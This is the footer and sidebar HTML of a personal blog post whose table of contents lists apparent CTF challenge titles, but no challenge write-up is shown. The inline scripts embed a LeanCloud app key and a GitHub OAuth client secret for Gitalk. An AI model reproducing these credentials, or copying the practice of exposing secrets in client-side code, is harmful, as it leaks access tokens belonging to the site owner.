      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Convert"><span class="nav-number">1.</span> <span class="nav-text">Convert</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Not-Baby"><span class="nav-number">2.</span> <span class="nav-text">Not_Baby</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ReallynotSecureAlgorithm"><span class="nav-number">3.</span> <span class="nav-text">ReallynotSecureAlgorithm</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#TechLead"><span class="nav-number">4.</span> <span class="nav-text">TechLead</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#miner"><span class="nav-number">5.</span> <span class="nav-text">miner</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#readFlag1"><span class="nav-number">6.</span> <span class="nav-text">readFlag1</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#readFlag2"><span class="nav-number">7.</span> <span class="nav-text">readFlag2</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#readFlag3"><span class="nav-number">8.</span> <span class="nav-text">readFlag3</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ProgrammersHateProgramming"><span class="nav-number">9.</span> <span class="nav-text">ProgrammersHateProgramming</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ProgrammersHateProgramming-2"><span class="nav-number">10.</span> <span class="nav-text">ProgrammersHateProgramming 2</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#cOrL"><span class="nav-number">11.</span> <span class="nav-text">cOrL</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Zhao Qi"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">Zhao Qi</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">43</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">42</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="sidebar-button motion-element">
    <a onclick="tidioChatApi.open();"><i class="fa fa-comment"></i>
    Chat
  </a>
  </div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ZhaoQi99" title="GitHub → https://github.com/ZhaoQi99" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.linkedin.com/in/zhaoqi99" title="Linkedin → https://www.linkedin.com/in/zhaoqi99" rel="noopener" target="_blank"><i class="fa fa-fw fa-linkedin"></i>Linkedin</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:zhaoqi99@outlook.com" title="E-Mail → mailto:zhaoqi99@outlook.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="tencent://AddContact/?fromId=45&fromSubId=1&subcmd=all&uin=956361916&website=www.oicqzone.com" title="QQ → tencent://AddContact/?fromId=45&fromSubId=1&subcmd=all&uin=956361916&website=www.oicqzone.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-qq"></i>QQ</a>
      </span>
  </div>



      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Zhao Qi</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">186k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">5:10</span>
</div>
  <div class="addthis_inline_share_toolbox">
    <script src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5a73dc9a89a291e2" async="async"></script>
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>






  <script>
  function leancloudSelector(url) {
    url = encodeURI(url);
    return document.getElementById(url).querySelector('.leancloud-visitors-count');
  }
  if (CONFIG.page.isPost) {
    function addCount(Counter) {
      var visitors = document.querySelector('.leancloud_visitors');
      var url = decodeURI(visitors.getAttribute('id'));
      var title = visitors.getAttribute('data-flag-title');

      Counter('get', `/classes/Counter?where=${JSON.stringify({ url })}`)
        .then(response => response.json())
        .then(({ results }) => {
          if (results.length > 0) {
            var counter = results[0];
            Counter('put', '/classes/Counter/' + counter.objectId, { time: { '__op': 'Increment', 'amount': 1 } })
              .then(response => response.json())
              .then(() => {
                leancloudSelector(url).innerText = counter.time + 1;
              })
              .catch(error => {
                console.error('Failed to save visitor count', error);
              })
          } else {
              Counter('post', '/classes/Counter', { title: title, url: url, time: 1 })
                .then(response => response.json())
                .then(() => {
                  leancloudSelector(url).innerText = 1;
                })
                .catch(error => {
                  console.error('Failed to create', error);
                });
          }
        })
        .catch(error => {
          console.error('LeanCloud Counter Error', error);
        });
    }
  } else {
    function showTime(Counter) {
      var visitors = document.querySelectorAll('.leancloud_visitors');
      var entries = [...visitors].map(element => {
        return decodeURI(element.getAttribute('id'));
      });

      Counter('get', `/classes/Counter?where=${JSON.stringify({ url: { '$in': entries } })}`)
        .then(response => response.json())
        .then(({ results }) => {
          if (results.length === 0) {
            document.querySelectorAll('.leancloud_visitors .leancloud-visitors-count').forEach(element => {
              element.innerText = 0;
            });
            return;
          }
          for (let item of results) {
            let { url, time } = item;
            leancloudSelector(url).innerText = time;
          }
          for (let url of entries) {
            var element = leancloudSelector(url);
            if (element.innerText == '') {
              element.innerText = 0;
            }
          }
        })
        .catch(error => {
          console.error('LeanCloud Counter Error', error);
        });
    }
  }

  fetch('https://app-router.leancloud.cn/2/route?appId=MnBX1GBcBpr93IXE9uTeMyDu-MdYXbMMI')
    .then(response => response.json())
    .then(({ api_server }) => {
      var Counter = (method, url, data) => {
        return fetch(`https://${api_server}/1.1${url}`, {
          method: method,
          headers: {
            'X-LC-Id': 'MnBX1GBcBpr93IXE9uTeMyDu-MdYXbMMI',
            'X-LC-Key': 'RpflrtuNUofuownICaX6FXW9',
            'Content-Type': 'application/json',
          },
          body: JSON.stringify(data)
        });
      };
      if (CONFIG.page.isPost) {
        if (CONFIG.hostname !== location.hostname) return;
        addCount(Counter);
      } else if (document.querySelectorAll('.post-title-link').length >= 1) {
        showTime(Counter);
      }
    });
  </script>


      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="//cdn.jsdelivr.net/gh/theme-next/theme-next-canvas-nest@1/canvas-nest.min.js"></script>
  <script size="300" alpha="0.6" zIndex="-1" src="//cdn.jsdelivr.net/gh/theme-next/theme-next-canvas-ribbon@1/canvas-ribbon.js"></script>
  <script src="//cdn.jsdelivr.net/npm/animejs@3.1.0/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/lozad@1/dist/lozad.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/velocity-animate@1/velocity.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/velocity-animate@1/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script>
<script src="/js/schemes/pisces.js"></script>
<script src="/js/next-boot.js"></script><script src="/js/bookmark.js"></script>

  <script defer src="//cdn.jsdelivr.net/gh/theme-next/theme-next-three@1/three.min.js"></script>
    <script defer src="//cdn.jsdelivr.net/gh/theme-next/theme-next-three@1/three-waves.min.js"></script>
    <script defer src="//cdn.jsdelivr.net/gh/theme-next/theme-next-three@1/canvas_lines.min.js"></script>
    <script defer src="//cdn.jsdelivr.net/gh/theme-next/theme-next-three@1/canvas_sphere.min.js"></script>


  
  <script>
    (function(){
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      bp.src = (curProtocol === 'https') ? 'https://zz.bdstatic.com/linksubmit/push.js' : 'http://push.zhanzhang.baidu.com/push.js';
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>




  <script src="/js/local-search.js"></script>





  <script src="//code.tidio.co/b79ynkhsb79sau11luajewp1xtr4os3z.js"></script>



<script>
if (document.querySelectorAll('div.pdf').length) {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/pdfobject@2/pdfobject.min.js', () => {
    document.querySelectorAll('div.pdf').forEach(element => {
      PDFObject.embed(element.getAttribute('target'), element, {
        pdfOpenParams: {
          navpanes: 0,
          toolbar: 0,
          statusbar: 0,
          pagemode: 'thumbs',
          view: 'FitH'
        },
        PDFJS_URL: '/lib/pdf/web/viewer.html',
        height: element.getAttribute('height') || '700px'
      });
    });
  }, window.PDFObject);
}
</script>




  

  

  
  <script src="//cdn.jsdelivr.net/npm/quicklink@1/dist/quicklink.umd.js"></script>
  <script>
      window.addEventListener('load', () => {
      quicklink({
        timeout: 3000,
        priority: true,
        ignores: [uri => uri.includes('#'),uri => uri == 'https://zhaoqi.vip/posts/2720124286/',]
      });
      });
  </script>

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID: '2bfc8024a0d12e3688e6',
      clientSecret: 'fcc20711a99e233437dd403c8ef7066c57c0259d',
      repo: 'zhaoqi99.github.io',
      owner: 'ZhaoQi99',
      admin: ['ZhaoQi99'],
      id: 'posts/2720124286/' ,
        language: 'zh-CN',
      distractionFreeMode: true,
      proxy: 'https://cors.zhaoqi.workers.dev/corsproxy/?apiurl=https://github.com/login/oauth/access_token',
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
